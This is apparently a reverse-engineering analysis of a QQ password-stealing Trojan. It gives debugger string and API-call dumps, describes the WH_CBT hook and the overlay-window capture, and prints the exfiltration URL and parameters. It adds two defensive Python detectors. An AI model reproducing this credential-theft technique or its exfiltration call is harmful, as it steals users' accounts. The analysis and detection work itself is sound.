File structure: .exe, 1.1, CrashRacoaF.fnr
The "remittance order" is a disguised Trojan; the image it displays actually lives on drive C as C:\remittance slip.jpg.
Brief analysis of the files:
.exe is the main program.
1.1 is a DLL ("Start"). Both files are packed, and the packer is easily removed.
CrashRacoaF.fnr is a zip archive. After decompression there are many files, but they are all the same file; its original name is shell.dll,
and its version information reads: Dalian youda wutao easy language Software Development Co., Ltd., Product Name: operating system interface function support library.
So this is an Easy Language runtime library and needs no analysis. Why there are so many copies of it is unclear.
If you delete 1.1 and run the .exe directly, the system reports that 1.1 cannot be found:
I think this only produces an error window and does no harm on its own. The main functionality is therefore in 1.1. After unpacking it, we first look at its string references in OD (OllyDbg):
100048AD push 1.1007BFCF  c:\remittance slip.jpg
100048E3 push 1.1007BFDD  rundll32.exe shimgvw.dll,imageview_fullscreen c:\remittance slip.jpg
100049A1 push 1.1007C019  qq.exe
100049F9 push 1.1007C020  tm.exe
10005AF9 push 1.1007C02F  qq2011
10005B12 push 1.1007C036  qq2010
10005B2B push 1.1007C03D  tm2009
10005C2C mov eax, 1.1007C044  edit
100061AF push 1.1007C02F  qq2011
1000641C push 1.1007C036  qq2010
10006689 push 1.1007C03D  tm2009
100072FF mov eax, 1.1007C072  http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp
10007562 push 1.1007C0AF  &qqpassword=
1000756C push 1.1007C0BC  ?qqnumber=
10007B6A push 1.1007C0F3  mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
10007BDF push 1.1007C0F3  mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)
10007BFE push 1.1007C126  http=
10007E74 push 1.1007C12C  http/1.1
10007F73 push 1.1007C135  accept:
10007FAD push 1.1007C13E  accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\n
10008002 push 1.1007C1ED  referer:
1000803C push 1.1007C1F7  \n
10008046 push 1.1007C1ED  referer:
1000809B push 1.1007C1FA  accept-language:
100080D5 push 1.1007C20C  accept-language: zh-cn\n
10008126 push 1.1007C225  get
100081B6 push 1.1007C229  post
100081EC push 1.1007C22E  content-type: application/x-www-form-urlencoded\n
10008267 push 1.1007C1F7  \n
1000826F push 1.1007C260  content-length:
10008409 mov ebx, 1.1000DE80  j
10008614 push 1.1007C271  set-cookie:
10008738 push 1.1007C271  set-cookie:
100087EE push 1.10077241  =
1000881F push 1.1007C27E  http://
10008A58 push 1.1007C27E  http://
The first two entries show how the image named "remittance order" is popped up (via rundll32.exe and shimgvw.dll).
The entries that follow belong to the main routine, which walks the process list looking for QQ (qq.exe, tm.exe); if it is running it is closed, so that you are prompted to log on again.
The Trojan then installs a WH_CBT hook:
0012F2E0 100679E0 /CALL to SetWindowsHookExA from 1.100679DA
0012F2E4 00000005 |HookType = WH_CBT
0012F2E8 100677B2 |Hookproc = 1.100677B2
0012F2EC 00000000 |hModule = NULL
0012F2F0 00000490 \ThreadID = 490
The hook is used to monitor newly created windows. If a window's title is QQ2011, QQ2010 or TM2009, the account theft begins.
The theft method is clever: two child windows are created inside the QQ logon box to intercept input:
0012F9FC 10067ADA /CALL to CreateWindowExA from 1.10067AD4
0012FA00 00000000 |ExtStyle = 0
0012FA04 100ABD80 |Class = "EDIT"
0012FA08 100B2324 |WindowName = ""
0012FA0C 0000100a0 |Style = WS_CHILD|WS_TABSTOP|WS_CLIPSIBLINGS|A0
0012FA10 00000001 |X = 1
0012FA14 00000000 |Y = 0
0012FA18 0000009B |Width = 9B (155.)
0012FA1C 0000001C |Height = 1C (28.)
0012FA20 000F01E6 |hParent = 000F01E6 (class='wtwindow')
0012FA24 00000064 |hMenu = 00000064 (window)
0012FA28 10000000 |hInst = 10000000
0012FA2C 00000000 \lParam = NULL
0012FA00 10067ADA /CALL to CreateWindowExA from 1.10067AD4
0012FA04 00000000 |ExtStyle = 0
0012FA08 0016A238 |Class = "Afx:10000000:B:10011:1900015:0"
0012FA0C 100B62F4 |WindowName = ""
0012FA10 44000000 |Style = WS_CHILD|WS_CLIPSIBLINGS
0012FA14 00000000 |X = 0
0012FA18 00000000 |Y = 0
0012FA1C 0000005D |Width = 5D (93.)
0012FA20 00000017 |Height = 17 (23.)
0012FA24 000F01E6 |hParent = 000F01E6 (class='wtwindow')
0012FA28 0000006E |hMenu = 0000006E (window)
0012FA2C 10000000 |hInst = 10000000
0012FA30 00000000 \lParam = NULL
Finally SetParent is called so that these controls become children of the QQ logon box.
After creation the QQ logon box looks like this:
The window marked in red was created by the Trojan, yet the QQ logon box shows no visible difference.
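A check a defender can run against a logon window for exactly this trick: every child control should have been created by the application's own module, so a child whose owning hInstance is a foreign DLL (here 10000000) is suspect, and a foreign EDIT with ES_PASSWORD set is the password-capture control itself (the "A0" that OllyDbg could not name in the first call above is ES_PASSWORD | ES_AUTOHSCROLL). This is an added example, not code from the original analysis; the QQ image base 0x00400000 and the child ids are placeholders taken from the dump.

```python
import ctypes

# Style bits from winuser.h.
WS_CHILD, WS_CLIPSIBLINGS, WS_TABSTOP = 0x40000000, 0x04000000, 0x00010000
ES_PASSWORD, ES_AUTOHSCROLL = 0x0020, 0x0080
GWL_STYLE, GWL_HINSTANCE = -16, -6

def suspicious_children(children, image_base):
    """Flag child controls not created by the application's own module.
    children: dicts with id, cls, style, hinst. Returns [(id, [reasons])]."""
    findings = []
    for c in children:
        if c["hinst"] == image_base:
            continue  # genuine control of the logon window
        reasons = ["owner module 0x%08X is not the process image 0x%08X"
                   % (c["hinst"], image_base)]
        if c["cls"].upper() == "EDIT" and c["style"] & ES_PASSWORD:
            reasons.append("foreign EDIT with ES_PASSWORD: can capture a password")
        if c["cls"].startswith("Afx:"):
            reasons.append("foreign Afx: class window (e.g. a fake button)")
        findings.append((c["id"], reasons))
    return findings

def enumerate_children(parent_hwnd):
    """Windows only (32-bit target assumed): collect class, style and owning
    hInstance of every child of parent_hwnd through user32."""
    user32 = ctypes.windll.user32
    cb_type = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.c_void_p, ctypes.c_void_p)
    out, buf = [], ctypes.create_unicode_buffer(256)
    def cb(hwnd, _):
        user32.GetClassNameW(hwnd, buf, 256)
        out.append({"id": hwnd, "cls": buf.value,
                    "style": user32.GetWindowLongW(hwnd, GWL_STYLE) & 0xFFFFFFFF,
                    "hinst": user32.GetWindowLongW(hwnd, GWL_HINSTANCE) & 0xFFFFFFFF})
        return True
    user32.EnumChildWindows(parent_hwnd, cb_type(cb), 0)
    return out

# Constructed from the two CreateWindowExA dumps above plus one genuine control.
# hinst 10000000 is the Trojan DLL's base; QQ's image base is a placeholder.
QQ_IMAGE_BASE = 0x00400000
DUMPED_CHILDREN = [
    {"id": 0x64, "cls": "EDIT", "hinst": 0x10000000,
     "style": WS_CHILD | WS_TABSTOP | WS_CLIPSIBLINGS | ES_PASSWORD | ES_AUTOHSCROLL},
    {"id": 0x6E, "cls": "Afx:10000000:B:10011:1900015:0", "hinst": 0x10000000,
     "style": WS_CHILD | WS_CLIPSIBLINGS},
    {"id": 0x01, "cls": "EDIT", "hinst": QQ_IMAGE_BASE,
     "style": WS_CHILD | WS_TABSTOP | ES_PASSWORD | ES_AUTOHSCROLL},
]
```

On Windows, call suspicious_children(enumerate_children(hwnd), image_base) with the logon window's handle and the target process's image base; offline, run it over DUMPED_CHILDREN and both Trojan controls are reported.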
The message loop of the created Edit control lives in 1.1. It sits as a child over the original password box and covers most of its area, so it receives your keystrokes.
The "Secure Login" button (not actually a button) is also a control created by the Trojan. Once you have entered the QQ number and password you will inevitably click the logon button;
the Trojan's child control then receives the message, which tells it that your input is complete. It then uses GetWindowText or WM_GETTEXT to read the QQ number from the QQ-number box above,
and sends it, together with the intercepted password, to the URL seen earlier: http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp.
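The strings above also give the network side something to alert on: a dynamic-DNS host under 3322.org, the fixed qq.asp path, the qqnumber/qqpassword parameters and a hard-coded IE 6 / Windows NT 5.0 User-Agent. The following is an added example, not part of the original analysis; it scores constructed proxy log lines (format assumed: client, method, URL, quoted User-Agent) against those indicators.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators taken from the string dump of 1.1.
C2_HOST_SUFFIX = ".3322.org"
C2_PATH = "/1109/9dnwdiuhd/qq.asp"
CRED_PARAMS = {"qqnumber", "qqpassword"}
HARDCODED_UA = "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)"

# Assumed proxy log layout: <client> <METHOD> <url> "<user-agent>"
LOG_LINE = re.compile(r'^(\S+) (GET|POST) (\S+) "([^"]*)"$')

def classify(line):
    """Return the indicator hits for one log line, or None if it does not parse."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    client, method, url, ua = m.groups()
    u = urlsplit(url)
    hits = []
    if u.hostname and u.hostname.lower().endswith(C2_HOST_SUFFIX):
        hits.append("dyndns-host")
    if u.path.lower() == C2_PATH:
        hits.append("c2-path")
    if {k.lower() for k in parse_qs(u.query)} & CRED_PARAMS:
        hits.append("credential-params")  # only visible when sent by GET
    if ua.lower() == HARDCODED_UA:
        hits.append("hardcoded-ua")
    return {"client": client, "method": method, "host": u.hostname,
            "hits": hits, "score": len(hits)}

def scan(lines, threshold=2):
    """Lines with at least `threshold` independent indicators are reported."""
    return [r for r in map(classify, lines) if r and r["score"] >= threshold]

# Constructed sample log: one GET exfiltration, one benign request, one POST.
SAMPLE_LOG = [
    '10.0.0.5 GET http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp'
    '?qqnumber=123456&qqpassword=placeholder '
    '"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)"',
    '10.0.0.7 GET http://www.example.com/index.html "Mozilla/5.0 (Windows NT 6.1)"',
    '10.0.0.5 POST http://heimawangluo.3322.org/1109/9dnwdiuhd/qq.asp '
    '"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)"',
]
```

For the POST variant the credentials travel in the form body (content-type application/x-www-form-urlencoded in the dump), so the body must be logged to see the credential-params hit; host, path and User-Agent still trigger.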